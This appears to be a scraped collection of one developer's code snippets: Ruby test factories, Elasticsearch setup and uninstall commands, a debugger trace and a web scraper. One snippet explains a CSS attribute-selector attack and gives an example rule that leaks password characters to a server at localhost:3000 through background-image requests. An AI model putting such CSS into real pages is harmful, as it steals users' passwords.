Lackoftactics

FactoryGirl.define do
  factory :registration_participant, class: Registration::Participant do
	  f_name { Faker::Name.first_name }
    l_name { Faker::Name.last_name }
    waiver_agree true
    token SecureRandom.hex(10)
    association :registrant, factory: :registration_registrant

    trait :skip_validate do
      registrant nil

Lackoftactics

factory :registration_active_registrant, class: Registration::Registrant do
  before(:create) do |registrant|
    registrant.class.skip_callback(:create, :before, :init)
    create(:active_registration_registrant_status) unless Registration::RegistrantStatus.exists?(name: 'Active')
  end

  completed_at Date.current
  activated_at Date.current
  status_id { Registration::RegistrantStatus::ACTIVE_ID }

Lackoftactics

#How it works This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.

For example, the following css will select all input's with a type that equals password and a value that ends with a. It will then try to load an image from http://localhost:3000/a.

input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); } Using a simple script one can create a css file that will send a custom request for every ASCII character.

Lackoftactics

launchctl unload /Users/przemyslawmroczek/Library/LaunchAgents/homebrew.mxcl.elasticsearch.plist                                         
launchctl  remove /Users/przemyslawmroczek/Library/LaunchAgents/homebrew.mxcl.elasticsearch.plist                                         
rm /Users/przemyslawmroczek/Library/LaunchAgents/homebrew.mxcl.elasticsearch.plist
brew services stop elasticsearch

brew uninstall elasticsearch

Lackoftactics

curl -XGET 'localhost:9200/events/_analyze?pretty' -H 'Content-Type: application/json' -d'
{
  "normalizer" : "sortable",
  "text" : "Triathlon race "
}
'

curl -XPUT 'localhost:9200/events/' -H 'Content-Type: application/json' -d'
{
"settings":  {"analysis":{"filter":{"ngram_small_filter":{"type":"nGram","min_gram":2,"max_gram":5},"ngram_medium_filter":{"type":"nGram","min_gram":3,"max_gram":20}},"analyzer":{"index_ngram_small_analyzer":{"type":"custom","tokenizer":"standard","filter":["lowercase","ngram_small_filter"]},"index_ngram_medium_analyzer":{"type":"custom","tokenizer":"standard","filter":["lowercase","ngram_medium_filter"]},"search_standard_analyzer":{"type":"custom","tokenizer":"standard","filter":["lowercase"]}},"normalizer":{"sortable":{"type":"custom","char_filter":[],"filter":["lowercase"]}}}},

Lackoftactics

curl -X PUT localhost:9200/books -d '
{
  "settings" : {
    "index" : {
      "analysis" : {
        "analyzer" : {
          "autocomplete_analyzer" : {
            "type" : "custom",
            "tokenizer" : "lowercase",

Lackoftactics

From: /home/przemek/Projects/dirble/spec/station_spec.rb @ line 20 :

    15:       station = Dirble::Station.by_continent('Asia').first
    16:       expect(station.name).to eq('Lounge Beats')
    17:     end
    18: 
    19:     it 'returns station filtered by country using iso code' do
 => 20:       station = Dirble::Station.by_country_code('us').first
    21:       expect(station.country).to eq('US')
    22:     end

Lackoftactics

$ rescue rspec

Lackoftactics

$ rescue rails s

Lackoftactics

#encoding: utf-8

 def fetch_job_links
    job_links = []
    if next_page_selector
      index_doc = Nokogiri::HTML(open(url))
      base_url = parse_base_url(url, index_doc)
      pagination = index_doc.at_xpath(next_page_selector)
      next_page_link = URI.join(base_url, pagination['href']).to_s rescue nil
      ##przed tą pętlą ustawia mi się next_page_link na nila, wiesz może dlaczego?